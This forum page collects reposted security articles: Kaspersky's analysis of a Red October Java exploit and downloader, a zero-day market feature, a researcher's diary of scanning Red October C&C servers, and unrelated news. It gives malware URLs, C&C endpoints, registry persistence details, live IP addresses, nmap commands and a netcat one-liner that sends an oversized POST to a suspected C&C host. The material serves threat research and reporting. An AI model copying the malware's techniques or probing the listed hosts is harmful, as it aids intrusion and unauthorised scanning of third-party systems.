Jump to content

Nytro

Administrators
  • Posts

    18735
  • Joined

  • Last visited

  • Days Won

    711

Everything posted by Nytro

  1. Red October - Java Exploit Delivery Vector Analysis GReAT Kaspersky Lab Expert Posted January 16, 13:00 GMT Since the publication of our report, our colleagues from Seculert have discovered and posted a blog about the usage of another delivery vector in the Red October attacks. In addition to Office documents (CVE-2009-3129, CVE-2010-3333, CVE-2012-0158), it appears that the attackers also infiltrated victim network(s) via Java exploitation (MD5: 35f1572eb7759cb7a66ca459c093e8a1 - 'NewsFinder.jar'), known as the 'Rhino' exploit (CVE-2011-3544). We know the early February 2012 timeframe that they would have used this technique, and this exploit use is consistent with their approach in that it's not 0-day. Most likely, a link to the site was emailed to potential victims, and the victim systems were running an outdated version of Java. However, it seems that this vector was not heavily used by the group. When we downloaded the php responsible for serving the '.jar' malcode archive, the line of code delivering the java exploit was commented out. Also, the related links, java, and the executable payload are proving difficult to track down to this point. The domain involved in the attack is presented only once in a public sandbox at malwr.com (Malwr - Analysis of c3b0d1403ba35c3aba8f4529f43fb300), and only on February 14th, the very same day that they registered the domain hotinfonews.com: [COLOR=#1f497d]Domain Name: HOTINFONEWS.COM Registrant: Privat Person Denis Gozolov (gozolov@mail.ru) Narva mnt 27 Tallinn Tallinn,10120 EE Tel. +372.54055298 Creation Date: 14-Feb-2012 Expiration Date: 14-Feb-2013 [/COLOR] Following that quick public disclosure, related MD5s and links do not show up in public or private repositories, unlike the many other Red October components. We could speculate that the group successfully delivered their malware payload to the appropriate target(s) for a few days, then didn't need the effort any longer. Which may also tell us that this group, which meticulously adapted and developed their infiltration and collection toolset to their victims' environment, had a need to shift to Java from their usual spearphishing techniques in early February 2012. And then they went back to their spear phishing. Also of note, there was a log recording three separate victim systems behind an IP address in the US, each connecting with a governmental economic research institute in the Middle East. So, this Java Rhino exploit appears to be of limited use. And, the functionality embedded on the server side PHP script that delivers this file is very different from the common and related functionality that we see in the backdoors used throughout the five year campaign. The crypto routines maintained and delivered within the exploit itself are configured such that the key used to decrypt the URL strings within the exploit is delivered within the Java applet itself. Here is our PHP encryption routine to encrypt the Url for the downloader content: And this is the function to embed the applet in the HTML, passing the encrypted URL string through parameter 'p': Here is the code within the applet that consumes the encrypted strings and uses it. The resulting functionality downloads the file from the URL and writes it to 'javaln.exe'. Notice that the strb and stra variables maintain the same strings as the $files and $charset variables in the php script: This "transfer" decryption routine returns a URL that is concatenated with the other variables, resulting in "hXXp://www.hotinfonews.com/news/dailynews2.php?id=&t=win". It is this content that is written to disk and executed on the victim's machine. A description of that downloader follows. It is most interesting that this exploit/php combination's encryption routine is different from the obfuscation commonly used throughout Red October modules. It further suggests that potentially this limited use package was developed separately from the rest for a specific target. 2nd stage of the attack: EXE, downloader The second stage of the attack is downloaded from "http://www.hotinfonews.com/news/dailynews2.php" and executed by the payload of the Java exploit. It acts as a downloader for the next stage of the attack. Known file location: %TEMP%\javaln.exe MD5: c3b0d1403ba35c3aba8f4529f43fb300 The file is a PE EXE file, compiled with Microsoft Visual Studio 2008 on 2012.02.06. The file is protected by an obfuscation layer, the same as used in many Red October modules. Obfuscation layer disassembled The module creates a mutex named "MtxJavaUpdateSln" and exits if it already exists. After that, it sleeps for 79 seconds and then creates one of the following registry values to be loaded automatically on startup: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] JavaUpdateSln=%full path to own executable% [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] JavaUpdateSln=%full path to own executable% Then, after a 49 second delay, it enters an infinite loop waiting for a working Internet connection. Every 67 seconds it sends a HTTP POST request to the following sites: Microsoft Home Page | Devices and Services update.microsoft.com Google Once a valid connection is established, it continues to its main loop. C&C server connection loop Every 180 seconds the module sends a HTTP POST request to its C&C server. The request is sent to a hardcoded URL: www.dailyinfonews.net/reportdatas.php The contents of the post request follow the following format: id=%unique user ID, retrieved from the overlay of the file%& A=%integer, indicates whether the autorun registry key was written%& B=%0 or 1, indicates if user has administrative rights%& C=%integer, level of privilege assigned to the current user% [TABLE=width: 100%] [TR] [TD=align: left]00000000 50 4f 53 54 20 68 74 74 70 3a 2f 2f 77 77 77 2e |POST http://www.| 00000010 64 61 69 6c 79 69 6e 66 6f 6e 65 77 73 2e 6e 65 |dailyinfonews.ne| 00000020 74 3a 38 30 2f 72 65 70 6f 72 74 64 61 74 61 73 |t:80/reportdatas| 00000030 2e 70 68 70 20 48 54 54 50 2f 31 2e 30 0d 0a 48 |.php HTTP/1.0..H| 00000040 6f 73 74 3a 20 77 77 77 2e 64 61 69 6c 79 69 6e |ost: www.dailyin| 00000050 66 6f 6e 65 77 73 2e 6e 65 74 3a 38 30 0d 0a 43 |fonews.net:80..C| 00000060 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 36 |ontent-length: 6| 00000070 32 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a |2..Content-Type:| 00000080 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 | application/x-w| 00000090 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 |ww-form-urlencod| 000000a0 65 64 0d 0a 0d 0a 69 64 3d 41 41 41 39 33 39 35 |ed....id=AAA9395| 000000b0 37 35 32 39 35 33 31 32 35 30 35 31 34 30 32 36 |7529531250514026| 000000c0 31 30 30 36 43 43 43 39 33 33 30 30 39 42 42 42 |1006CCC933009BBB| 000000d0 31 36 35 34 31 35 31 33 26 41 3d 31 26 42 3d 31 |16541513&A=1&B=1| 000000e0 26 43 3d 32 |&C=2| [/TD] [/TR] [/TABLE] HTTP POST request sent to the C&C server The module decrypts the C&C response with AMPRNG algorithm using a hardcoded key. Then, it checks if there is a valid EXE signature ("MZ") at offset 37 in the decrypted buffer. If the signature is present, it writes the EXE file to "%TEMP%\nvsvc%p%p.exe" (%p depends on system time) and executes it. 3rd stage of the attack: EXE, unknown Currently, the C&C server is unavailable and we do not have the executables that were served to the "javaln.exe" downloader. Most likely, they were the actual droppers, similar to the ones used with Word and Excel exploits. Conclusions As more information about the Red October becomes available and third parties are publishing their own research into the attacks, it becomes clear that the scope of the operation is bigger than originally thought. In addition to the Java exploit presented here, it's possible that other delivery mechanisms were used during the 5 years since this gang was active. For instance, we haven't seen any PDF exploits yet, which are very popular with other groups - an unusual thing. We will continue to monitor the situation and publish updates as the story uncovers. Sursa: Red October - Java Exploit Delivery Vector Analysis - Securelist
  2. Security audit finds dev OUTSOURCED his JOB to China to goof off at work Cunning scheme netted him 'best in company' awards By Iain Thomson in San Francisco Posted in Business, 16th January 2013 A security audit of a US critical infrastructure company last year revealed that its star developer had outsourced his own job to a Chinese subcontractor and was spending all his work time playing around on the internet. The firm's telecommunications supplier Verizon was called in after the company set up a basic VPN system with two-factor authentication so staff could work at home. The VPN traffic logs showed a regular series of logins to the company's main server from Shenyang, China, using the credentials of the firm's top programmer, "Bob". "The company's IT personnel were sure that the issue had to do with some kind of zero day malware that was able to initiate VPN connections from Bob's desktop workstation via external proxy and then route that VPN traffic to China, only to be routed back to their concentrator," said Verizon. "Yes, it is a bit of a convoluted theory, and like most convoluted theories, an incorrect one." After getting permission to study Bob's computer habits, Verizon investigators found that he had hired a software consultancy in Shenyang to do his programming work for him, and had FedExed them his two-factor authentication token so they could log into his account. He was paying them a fifth of his six-figure salary to do the work and spent the rest of his time on other activities. The analysis of his workstation found hundreds of PDF invoices from the Chinese contractors and determined that Bob's typical work day consisted of: 9:00 a.m. – Arrive and surf Reddit for a couple of hours. Watch cat videos 11:30 a.m. – Take lunch 1:00 p.m. – Ebay time 2:00-ish p.m – Facebook updates, LinkedIn 4:30 p.m. – End-of-day update e-mail to management 5:00 p.m. – Go home The scheme worked very well for Bob. In his performance assessments by the firm's human resources department, he was the firm's top coder for many quarters and was considered expert in C, C++, Perl, Java, Ruby, PHP, and Python. Further investigation found that the enterprising Bob had actually taken jobs with other firms and had outsourced that work too, netting him hundreds of thousands of dollars in profit as well as lots of time to hang around on internet messaging boards and checking for a new . Bob is no longer employed by the firm. ® Sursa: Security audit finds dev OUTSOURCED his JOB to China to goof off at work • The Register Smecher tipu
  3. [h=2]Cyberwar’s Gray Market[/h][h=1]Should the secretive hacker zero-day exploit market be regulated?[/h] By Ryan Gallagher|Posted Wednesday, Jan. 16, 2013 Behind computer screens from France to Fort Worth, Texas, elite hackers hunt for security vulnerabilities worth thousands of dollars on a secretive unregulated marketplace. Using sophisticated techniques to detect weaknesses in widely used programs like Google Chrome, Java, and Flash, they spend hours crafting “zero-day exploits”—complex codes custom-made to target a software flaw that has not been publicly disclosed, so they can bypass anti-virus or firewall detection to help infiltrate a computer system. Like most technologies, the exploits have a dual use. They can be used as part of research efforts to help strengthen computers against intrusion. But they can also be weaponized and deployed aggressively for everything from government spying and corporate espionage to flat-out fraud. Now, as cyberwar escalates across the globe, there are fears that the burgeoning trade in finding and selling exploits is spiralling out of control—spurring calls for new laws to rein in the murky trade. Advertisement Some legitimate companies operate in a legal gray zone within the zero-day market, selling exploits to governments and law enforcement agencies in countries across the world. Authorities can use them covertly in surveillance operations or as part of cybersecurity or espionage missions. But because sales are unregulated, there are concerns that some gray market companies are supplying to rogue foreign regimes that may use exploits as part of malicious targeted attacks against other countries or opponents. There is also an anarchic black market that exists on invite-only Web forums, where exploits are sold to a variety of actors—often for criminal purposes. The importance of zero-day exploits, particularly to governments, has become increasingly apparent in recent years. Undisclosed vulnerabilities in Windows played a crucial role in how Iranian computers were infiltrated for surveillance and sabotage when the country’s nuclear program was attacked by the Stuxnet virus (an assault reportedly launched by the United States and Israel). Last year, at least eight zero days in programs like Flash and Internet Explorer were discovered and linked to a Chinese hacker group dubbed the “Elderwood gang,” which targeted more than 1,000 computers belonging to corporations and human rights groups as part of a shady intelligence-gathering effort allegedly sponsored by China. The most lucrative zero days can be worth hundreds of thousands of dollars in both the black and gray markets. Documents released by Anonymous in 2011 revealed Atlanta-based security firm Endgame Systems offering to sell 25 exploits for $2.5 million. Emails published alongside the documents showed the firm was trying to keep “a very low profile” due to “feedback we've received from our government clients.” (In keeping with that policy, Endgame didn’t respond to questions for this story.) But not everyone working in the business of selling software exploits is trying to fly under the radar—and some have decided to blow the whistle on what they see as dangerous and irresponsible behavior within their secretive profession. Adriel Desautels, for one, has chosen to speak out. The 36-year-old “exploit broker” from Boston runs a company called Netragard, which buys and sells zero days to organizations in the public and private sectors. (He won’t name names, citing confidentiality agreements.) The lowest-priced exploit that Desautels says he has sold commanded $16,000; the highest, more than $250,000. Unlike other companies and sole traders operating in the zero-day trade, Desautels has adopted a policy to sell his exploits only domestically within the United States, rigorously vetting all those he deals with. If he didn’t have this principle, he says, he could sell to anyone he wanted—even Iran or China—because the field is unregulated. And that’s exactly why he is concerned. “As technology advances, the effect that zero-day exploits will have is going to become more physical and more real,” he says. “The software becomes a weapon. And if you don’t have controls and regulations around weapons, you’re really open to introducing chaos and problems.” Desautels says he knows of “greedy and irresponsible” people who “will sell to anybody,” to the extent that some exploits might be sold by the same hacker or broker to two separate governments not on friendly terms. This can feasibly lead to these countries unwittingly targeting each other’s computer networks with the same exploit, purchased from the same seller. “If I take a gun and ship it overseas to some guy in the Middle East and he uses it to go after American troops—it’s the same concept,” he says. The position Desautels has taken casts him as something of an outsider within his trade. France’s Vupen, one of the foremost gray-market zero-day sellers, takes a starkly different approach. Vupen develops and sells exploits to law enforcement and intelligence agencies across the world to help them intercept communications and conduct “offensive cyber security missions,” using what it describes as “extremely sophisticated codes” that “bypass all modern security protections and exploit mitigation technologies.” Vupen’s latest financial accounts show it reported revenue of about $1.2 million in 2011, an overwhelming majority of which (86 percent) was generated from exports outside France. Vupen says it will sell exploits to a list of more than 60 countries that are members or partners of NATO, provided these countries are not subject to any export sanctions. (This means Iran, North Korea, and Zimbabwe are blacklisted—but the likes of Kazakhstan, Bahrain, Morocco, and Russia are, in theory at least, prospective customers, as they are not subject to any sanctions at this time.) “As a European company, we exclusively work with our allies and partners to help them protect their democracies and citizens against threats and criminals,” says Chaouki Bekrar, Vupen’s CEO, in an email. He adds that even if a given country is not on a sanctions list, it doesn’t mean Vupen will automatically work with it, though he declines to name specific countries or continents where his firm does or does not have customers. Vupen’s policy of selling to a broad range of countries has attracted much controversy, sparking furious debate around zero-day sales, ethics, and the law. Chris Soghoian of the ACLU—a prominent privacy and security researcher who regularly spars with Vupen CEO Bekrar on Twitter—has accused Vupen of being “modern-day merchants of death” selling “the bullets for cyberwar.” “Just as the engines on an airplane enable the military to deliver a bomb that kills people, so too can a zero day be used to deliver a cyberweapon that causes physical harm or loss of life,” Soghoian says in an email. He is astounded that governments are “sitting on flaws” by purchasing zero-day exploits and keeping them secret. This ultimately entails “exposing their own citizens to espionage,” he says, because it means that the government knows about software vulnerabilities but is not telling the public about them. Some claim, however, that the zero-day issue is being overblown and politicized. “You don’t need a zero day to compromise the workstation of an executive, let alone an activist,” says Wim Remes, a security expert who manages information security for Ernst & Young. Others argue that the U.S. government in particular needs to purchase exploits to keep pace with what adversaries like China and Iran are doing. “If we’re going to have a military to defend ourselves, why would you disarm our military?” says Robert Graham at the Atlanta-based firm Errata Security. “If the government can’t buy exploits on the open market, they will just develop them themselves,” Graham says. He also fears that regulation of zero-day sales could lead to a crackdown on legitimate coding work. “Plus, digital arms don’t exist—it’s an analogy. They don’t kill people. Bad things really don’t happen with them.” * * * So are zero days really a danger? The overwhelming majority of compromises of computer systems happen because users failed to update software and patch vulnerabilities that are already known about. However, there are a handful of cases in which undisclosed vulnerabilities—that is, zero days—have been used to target organizations or individuals. It was a zero day, for instance, that was recently used by malicious hackers to compromise Microsoft’s Hotmail and steal emails and details of the victims' contacts. Last year, it was reported that a zero day was used to target a flaw in Internet Explorer and hijack Gmail accounts. Noted “offensive security” companies such as Italy’s Hacking Team and the England-based Gamma Group are among those to make use of zero-day exploits to help law enforcement agencies install advanced spyware on target computers—and both of these companies have been accused of supplying their technologies to countries with an authoritarian bent. Tracking and communications interception can have serious real-world consequences for dissidents in places like Iran, Syria, or the United Arab Emirates. In the wrong hands, it seems clear, zero days could do damage. This potential has been recognized in Europe, where Dutch politician Marietje Schaake has been crusading for groundbreaking new laws to curb the trade in what she calls “digital weapons.” Speaking on the phone from Strasbourg, France*, Schaake tells me she’s concerned about security exploits, particularly where they are being sold with the intent to help enable access to computers or mobile devices not authorized by the owner. She adds that she is considering pressing for the European Commission, the EU’s executive body, to bring in a whole new regulatory framework that would encompass the trade in zero days, perhaps by looking at incentives for companies or hackers to report vulnerabilities that they find. Such a move would likely be welcomed by the handful of organizations already working to encourage hackers and security researchers to responsibly disclose vulnerabilities they find instead of selling them on the black or gray markets. The Zero Day Initiative, based in Austin, Texas, has a team of about 2,700 researchers globally who submit vulnerabilities that are then passed on to software developers so they can be fixed. ZDI, operated by Hewlett-Packard, runs competitions in which hackers can compete for a pot of more than $100,000 in prize funds if they expose flaws. “We believe our program is focused on the greater good,” says Brian Gorenc, a senior security researcher who works with the ZDI. Yet for some hackers, disclosing vulnerabilities directly to developers lacks appeal because greater profits can usually always be made elsewhere. When I ask Vupen’s Bekrar what he thinks of responsible disclosure programs, he is critical of “lame” rewards on offer and predicts that for this reason an increasing number of skilled hackers in the future will “keep their research private to sell it to governments.” It may also be the case that, no matter what the financial incentive, for some it will always be more of a thrill to shun the “responsible.” So even if regulators internationally were to somehow curb exploit sales, it’s likely it would only have a tangible impact on legitimate companies like Vupen, Endgame, Netragard, and others. There would remain a burgeoning black market, in which vulnerabilities are sold off to the highest bidder. This market exists in an anarchic pocket of the Internet, a sort of Wild West, where legality is rarely of paramount importance—as former Washington Post reporter Brian Krebs recently found out for himself. Krebs, who regularly publishes scoops about zero days on his popular blog, has on several occasions been besieged by hackers after writing about vulnerabilities circulating on the black market. Krebs says his website came under attack last year after he exposed a zero day that was being sold on an exclusive, invite-only Web forum. “They don’t like the attention,” he says. The hackers were able to find Krebs’ home IP address. Then, they began targeting his Internet connection and taunting him. Krebs was eventually forced to change his router and has since signed up for a service that helps protect his online identity. But he says he still receives malware by email “all the time.” It’s difficult to imagine how the aggressive black market that Krebs encountered could ever be efficiently curtailed by laws. That is why the best way for vulnerabilities to be fully eliminated—or at least drastically reduced—would perhaps be to place a greater burden on the software developers to raise standards. If only developers would invest more in protecting user security by designing better, safer software and by swiftly patching security flaws, the zero-day marketplace would likely be hit by a crushing recession. At present, however, that remains an unlikely prospect. And unfortunately it seems there’s not a great deal you can do about it, other than to be aware of the risk. “Most organizations are one zero day away from compromise,” Krebs says. “If it’s a widely used piece of software, you’ve just got to assume these days that it’s got vulnerabilities that the software vendors don’t know about—but the bad guys do.” This article arises from Future Tense, a collaboration among Arizona State University, the New America Foundation, and Slate. Future Tense explores the ways emerging technologies affect society, policy, and culture. To read more, visit the Future Tense blog and the Future Tense home page. You can also follow us on Twitter. Sursa: Zero-day exploits: Should the hacker gray market be regulated? - Slate Magazine
  4. The Hunt For Red October Posted on January 14, 2013 by infodox The Hunt For Red October – The Job So Far Today, Kaspersky Labs released a report on a long running advanced persistent threat* (APT) they had uncovered, revealing a long running cyber-espionage campaign targetting a broad and diverse mixture of both countries and sectors. As usual the fingers were pointed at China (Chinese exploit chains, Chinese hosts used…), however, there was also some evidence to implicate Russian involvement, which was speculated to be a “Fasle Flag” attempt. An associate of mine, after reading the report, came up with a SHODAN dork rather quickly to identify the C&C hosts. http://www.shodanhq.com/search?q=Last-Modified%3A+%27Tue%2C+21+Feb+2012+09%3A00%3A41+GMT%27+Apache After a few seconds, he realized that the etag header on all of them was the same, leading to the following query: http://www.shodanhq.com/?q=8c0bf6-ba-4b975a53906e4 SO, Fingerprinting information: just check for etag = 8c0bf6-ba-4b975a53906e4 The “offending IP’s” are as follows. These are used as proxies it appears. 31.41.45.119 37.235.54.48 188.40.19.244 141.101.239.225 46.30.41.112 188.72.218.213 31.41.45.9 So, we now have a list of 7 C&C hosts. Time to break out nmap and see what they are doing. The following scan string was used for an initial scan of all the hosts. sudo nmap -sSUV -A -O -vvv 3 -oA huntingredoctober 31.41.45.119 37.235.54.48 188.40.19.244 141.101.239.225 46.30.41.112 188.72.218.213 31.41.45.9 The tarball of report files is available here: huntingredoctober.tar The hosts identified as alive are as follows: 37.235.54.48 188.40.19.244 31.41.45.119 The other four were not responsive, probably taken down already. No fun. Once I had identified which hosts were, infact, still alive (while the rest of the bloody slow scan was running), I decided to see what lay behind the scenes on these hosts, doing the “daft” thing of connecting to port 80 using my web browser. The clench factor was rather intense as I half expected to be owned by about half a dozen super 0day exploits on crack while doing so. instead, I was redirected harmlessly to the BBC. The following HTML code was responsible for this redirect, which I thought was an incredibly clever way to hide their true purpose. <!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.0 Transitional//EN”> <html> <head> <title>BBC – Homepage</title> <meta http-equiv=”REFRESH” content=”0;url=http://www.bbc.com/”></HEAD> </HTML> Back to the nmap scan (it had FINALLY completed), the following was very interesting. PORT STATE SERVICE VERSION 80/tcp open http? |_http-title: BBC – Homepage | http-methods: GET HEAD POST OPTIONS TRACE | Potentially risky methods: TRACE |_See http://nmap.org/nsedoc/scripts/http-methods.html 138/udp open|filtered netbios-dgm 520/udp filtered route All of the servers looked like this. They all had those three ports – 80, 138, 520, open or filtered. The rest were all closed. The 188.40.19.244 host began sending me RST packets midway through my scan, but regardless, the work went on. I decided I was going to look at the webserver from informations kaspersky published. Sending GET requests to the /cgi-bin/ms/check CGI script produced a 500 internal server error, as did other CGI scripts. This was interesting in that they told me to email eaxample@example.com about it. I did so immediately, being a good netizen. Note the mispelling of example – “eaxample”. Emailing the big heckers. The email delivered Apparently the mail was delivered successfully, so I hope they reply soon with an explaination. On to more serious things, another analyst working with me uncovered another interesting thing. He went and did the following: printf “POST /cgi-bin/nt/th HTTP/1.1\r\nHost: 37.235.54.48\r\nContent-Length: 10000\r\n\r\n%s” `perl -e ‘print “A” x 20000)’` | torsocks nc 37.235.54.48 80 Now, he had figured out the page would 500, unless a content length was set. So, he set a long Content Length, and sent an even longer POST request. The result was nothing short of fascinating. HTTP/1.1 200 OK Date: Mon, 14 Jan 2013 19:18:07 GMT Server: Apache Content-length: 0 Content-Type: text/html HTTP/1.1 414 Request-URI Too Large Date: Mon, 14 Jan 2013 19:18:08 GMT Server: Apache Content-Length: 250 Connection: close Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC “-//IETF//DTD HTML 2.0//EN”> <html><head> <title>414 Request-URI Too Large</title> </head><body> <h1>Request-URI Too Large</h1> <p>The requested URL’s length exceeds the capacity limit for this server.<br /> </p> </body></html> “Look mom! Two headers!”. Seriously, this is interesting. First it gives a 200 OK, then a second later something else says “LOL, NO”. The delay makes us think the proxy is saying “OK”, then the real C&C is complaining. The fact it complains about a request URL, and the length being in the POST request, makes me think the final data-to-C&C might be sent as a GET. Just a theory. — TO BE CONTINUED — // This post suffered a bad case of myself and fellow researchers having a lulz about it, and my cat straying onto my keyboard. It is a work in progress. — Continuing the hunt — Today we retrieved new intelligence (or rather, last night, but I could not act on this intel) from HD Moore of Metasploit project that more C&C servers had been located. The following link is the list of IP addresses. http://pastie.org/private/ytbrfmqpn8alfjfrnbhcbw So, it was decided (once the cat had gotten the hell off my keyboard) to investigate this list. @craiu provided us with the tip “check out “1c824e-ba-4bcd8c8b36340? and “186-1333538825000? too.”, so we will act upon this later. I decided, seeing as my internet went down for a while, to test out my Python skillz, and whipped up a quick program I named “SONAR”, which simply attempted a TCP connection to port 80 on the suspected C&C servers and logged responsive ones to a file. Source code attached. sonar.tar Sonar... I could have used nmap, but that would have been unimaginative and, frankly, no fun. And who says hunting cyber-spies (So much worse than normal spies, ‘cos they got the dreaded CYBER in there) is not supposed to be bloody fun anyway, not me for certain! We quickly reduced the list to a “lot less than we had”, and I qued them up for nmap scanning, which has yet to be done, as the sysadmins on the network I am using do not like when I portscan things for some odd reason. Or when I use SSH, or email. Anyway, I digress. So far, more C&C servers had been identified, and more “Fingerprinting” methods had been developed. I am considering writing a patch to sonar.py to dump out the etag data along with working IP’s, but that can wait til later. A simple HTTP GET / should do the trick, with a few regex’s. We also obtained a list of MD5 hashes from malware.lu showing samples of Red October they have in their repo – see here -> 053d92ba6413ea31af9898e7d57692b68e42117a61b2d6de4556e9b707314fd7 16d5114b8613f9 - Pastebin.com so those were qued up for downloading (once on a non monitored by college network) for some analysis using IDA. That is to be tonights job – a quick and dirty first pass run of analysing these things. * For the record, I think APT is another FUD term… But oh well, it has become “a thing”. Sursa: The Hunt For Red October | Insecurety Research
  5. Fedora 18 released [TABLE] [TR] [TD]From:[/TD] [TD][/TD] [TD]Robyn Bergeron <rbergero-AT-redhat.com>[/TD] [/TR] [TR] [TD]To:[/TD] [TD][/TD] [TD]announce-AT-lists.fedoraproject.org[/TD] [/TR] [TR] [TD]Subject:[/TD] [TD][/TD] [TD]Announcing the release of Fedora 18.[/TD] [/TR] [TR] [TD]Date:[/TD] [TD][/TD] [TD]Tue, 15 Jan 2013 10:03:18 -0500 (EST)[/TD] [/TR] [/TABLE] The Fedora Project is incredibly delighted to announce the release of Fedora 18 ("Spherical Cow"). Heck, we'd even say that getting this release to you has been a mooving experience. Fedora is a leading-edge, free and open source operating system that continues to deliver innovative features to many users, with a new release about every six months...or so. But no bull: Spherical Cow, is of course, Fedora's best release yet. You'll go through the hoof when you hear about the Grade A Prime F18 features. You can always cownt on us to bring you the best features first. Can't wait for a taste? You can get started downloading now: http://fedoraproject.org/get-fedora Detailed information about this release can be seen in the release notes: http://docs.fedoraproject.org/en-US/Fedora/18/html/Releas... == What's New in Fedora 18? == The Fedora Project takes great pride in being able to show off features for all types of use cases, including traditional desktop users, systems administration, development, the cloud, and many more. But a few new features are guaranteed to be seen by nearly anyone installing Fedora and are improvements that deserve to be called out on their own. The user interface for Fedora's installation software, Anaconda, has been completely re-written from the ground up. Making its debut in Fedora 18, the new UI introduces major improvements to the installation experience. It uses a hub-and-spoke model that makes installation easier for new users, offering them concise explanations about their choices. Advanced users and system administrators are of course still able to take advantage of more complex options. The general look and feel of the installation experience has been vastly upgraded, providing modern, clean, and comprehensible visuals during the process. While the new installer should work well for most users in most configurations, there are inevitably a few teething problems in the first release of such a major revision. Known design limitations of the new installer in F18 are listed here: http://fedoraproject.org/wiki/Anaconda/NewInstaller Known significant bugs can be seen here: http://fedoraproject.org/wiki/Common_F18_bugs#Installatio... We welcome your constructive and specific feedback as we continue to work on refining the installer for future releases. The upgrade process for Fedora now uses a new tool called FedUp (Fedora Upgrader). FedUp replaces pre-upgrade as well as the DVD methods for upgrading that have been used in previous Fedora releases. FedUp integrates with systemd to enable the upgrade functionality, doing the work in a pristine boot environment. Of course, it wouldn't be a release announcement without a spotted -- er, dotted -- list of all the other fantastic features you'll see in Fedora 18: === For desktop users === Moooove over, stale desktops. We've got a small herd of choices udderly suited to your preferences. * GNOME 3.6: The newest version of the GNOME desktop provides an enhanced Messaging Tray, support for Microsoft Exchange and Skydrive, and many more new features. * Cinnamon: Fedora users now have the option of using Cinnamon, an advanced desktop environment based on GNOME 3. Cinnamon takes advantage of advanced features provided by the GNOME backend while providing users with a more traditional desktop experience. * MATE Desktop: The MATE desktop provides users with a classic GNOME 2.x style user interface. This desktop is perfect for users who have been running GNOME Classic or other window managers like XFCE as an alternative to GNOME 3. * KDE Plasma Workspaces 4.9: KDE Plasma Workspaces has been updated with many new features and improved stability and performance, including updates to the Dolphin File Manager, Konsole, and KWin Window manager. * Xfce 4.10: The lightweight and easy-to-use Xfce desktop has been updated to the 4.10 version with many bug fixes and enhancements, including a new MIME type editor, a reworked xfce4-run dialog, improved mouse settings, tabs in the Thunar file manager, and options to tile windows in xfwm4. Through all of these and more, Xfce continues to improve without getting in your way. Regardless of your desktop choice, Fedora 18 offers... * Improved storage management: SSM (System Storage Manager) is an easy-to-use command-line interface tool that presents a unified view of storage management tools. Devices, storage pools, volumes, and snapshots can now be managed with one tool, with the same syntax for managing all of your storage. (It's great for systems administrators, too!) === For developers === For developers there are all sorts of moo-tivating goodies: * Fresh versions of programming languages: Using Perl, Rails, or Python? All three of these languages are updated in Fedora 18. We've got Rails 3.2, Python 3.3, and Perl 5.16 fresh off the farm. * Clojure gets more love with the addition of tooling packages, including the Leinengen build tool, as well as Clojure libraries and frameworks, including Korma and Noir. * DragonEgg connects GCC and LLVM: DragonEgg is a plugin for the GCC compilers to allow use of the LLVM optimization and code-generation framework. DragonEgg provides software developers with more optimization and code-generation options for use with the GCC compilers. DragonEgg also allows GCC to be used for cross-compilation to target architectures supported by LLVM without requiring any special cross-compilation compiler packages. Fedora continues to develop and use GCC as the standard default compiler. === For systems administrators === Keep track of your infrastructure herds with these new features: * Offline system updates: Systems can now be updated offline, allowing for a more stable update of critical system components. This functionality is only integrated with GNOME Desktop Environment in this release but uses the distribution neutral PackageKit and systemd API's and hence can be made available for other desktop environments as well based on the interest from upstream developers. * Storage enhancements: StorageManagement is a collection of tools and libraries for managing storage area networks (SAN) and network attached storage (NAS). * Samba 4: This popular suite of tools has long provided file- and print-sharing services in heterogeneous operating system environments. The long-awaited Samba 4 introduces the first free and open source implementation of Active Directory protocols and includes a new scripting interface, allowing Python programs to interface to Samba's internals. * Riak: A fault-tolerant key-value store, Riak provides easy operations and predictable scaling as a NoSQL database. === For clouds and virtualization === Do you spend your days <strike>grazing</strike> gazing into the clouds? Here's just a taste of some of the cloud and virt features you'll see in Fedora 18: * Eucalyptus makes its first appearance in Fedora, with their 3.2 release included in F18. This platform for on-premise (private) Infrastructure-as-a-Service clouds uses existing infrastructure to create scalable and secure AWS-compatible cloud resources for compute, network, and storage. * OpenStack: With the Folsom release in Fedora 18, OpenStack continues to have the newest releases in Fedora. This open source cloud computing platform enables users to deploy their own cloud infrastructures for private or public cloud deployments. Heat, an incubated OpenStack project, is also available in F18, providing an API that enables the orchestration of cloud applications using file or web based templates. * oVirt Engine: The management application for the oVirt virtualization platform, oVirt Engine, is updated to the newest version, 3.1. This release includes extensive new features, including support for live snapshots, cloning virtual machines from snapshots, quotas, and more. * Suspend and resume support for virt guests: Virtual machines get love with this feature, enabling the ability to suspend and resume guests, with the close of a laptop lid or menu option or via the command line. And that's only the beginning. For a more complete list with details of all the new features in Fedora 18, steer over to: http://fedoraproject.org/wiki/Releases/18/FeatureList == Downloads, upgrades, documentation, and common bugs == The steaks are high--don't miss out on installing the best version of Fedora yet! Get it now: http://get.fedoraproject.org/ If you are upgrading from a previous release of Fedora, refer to: http://fedoraproject.org/wiki/Upgrading Fedora has replaced pre-upgrade with FedUp (excuse the pun.. or don't), a more robust solution, and pushed several bug fixes to older releases of Fedora to enable an easy upgrade to Fedora 18. Graze...er, gaze...upon the full release notes for Fedora 18, guides for several languages, and learn about known bugs and how to report new ones, here: http://docs.fedoraproject.org/ With all the changes to the installer, we particularly recommend reading the Installation Guide: http://docs.fedoraproject.org/en-US/Fedora/18/html/Instal... Everyone makes missteaks. Fedora 18 common bugs are documented at: http://fedoraproject.org/wiki/Common_F18_bugs This page includes information on several known bugs in the installer, so we recommend reading it before installing Fedora 18. == Fedora Spins == Fedora spins are alternate versions of Fedora tailored for various types of users via hand-picked application set or customizations, from desktop options to spins for those interested in gaming, robotics, or design software. More information on our various spins is available at: http://spins.fedoraproject.org == Contributing == There are many ways to contribute beyond bug reporting. You can help translate software and content, test and give feedback on software updates, write and edit documentation, design and do artwork, help with all sorts of promotional activities, and package free software for use by millions of Fedora users worldwide. To get started, visit http://join.fedoraproject.org today! == Fedora 19 == Even as we continue to provide updates with enhancements and bug fixes to improve the Fedora number experience, our next release, Fedora 19, is already being developed in parallel and has been open for active development for several months already. We have an early plan for release at the end of May 2013, and the final schedule for F19 is going to be based on the results of the planning process: 